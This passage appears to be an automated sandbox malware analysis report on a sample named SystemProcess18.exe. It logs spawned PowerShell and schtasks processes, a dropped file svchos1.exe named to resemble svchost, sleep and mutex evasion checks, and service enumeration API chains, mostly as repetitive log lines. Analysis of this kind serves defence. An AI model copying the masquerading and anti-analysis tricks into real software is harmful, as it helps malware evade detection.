Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Documents\MM\svchos1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035DD590	28_2_035DD590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035DDB80	28_2_035DDB80
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0309D590	29_2_0309D590
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0309DB80	29_2_0309DB80

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\Public\Documents\MM\svchos1.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_28-105076

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035E1A50 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Sleep,

28_2_035E1A50

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlen,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcat,lstrcat,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		28_2_035D9930
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlen,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcat,lstrcat,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,		29_2_03099930

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\SystemProcess18.exe	Window / User API: threadDelayed 2727	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Window / User API: threadDelayed 454	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Window / User API: threadDelayed 1846	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Window / User API: foregroundWindowGot 1761	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6191
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2149
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7985
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 970
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7789
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1469
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7803
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1026
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8413
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8162
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7585
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2013
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8165
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1448

Source: C:\Users\Public\Documents\MM\svchos1.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_28-104491

Source: C:\Users\Public\Documents\MM\svchos1.exe	API coverage: 3.7 %
Source: C:\Users\Public\Documents\MM\svchos1.exe	API coverage: 3.5 %

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 29_2_0309DB80

29_2_0309DB80

Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7300	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7452	Thread sleep count: 2727 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7452	Thread sleep time: -2181600s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7284	Thread sleep count: 137 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7780	Thread sleep count: 454 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7780	Thread sleep time: -1362000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7800	Thread sleep time: -52000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7536	Thread sleep count: 1846 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7536	Thread sleep time: -1476800s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -117000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -108000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -52000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -42000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7824	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7824	Thread sleep time: -45500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -2200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -222000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7684	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -84000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -103000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -186000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -264000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -64000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -69000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -136000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -284000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -280000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -109000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -63000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -106000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -82000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -204000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -144000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -192000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -279000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -101000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -438000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7336	Thread sleep time: -145000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -236000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -131000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -89000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7536	Thread sleep count: 48 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7536	Thread sleep time: -38400s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -125000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -81000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -264000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe TID: 7316	Thread sleep time: -116000s >= -30000s	Jump to behavior
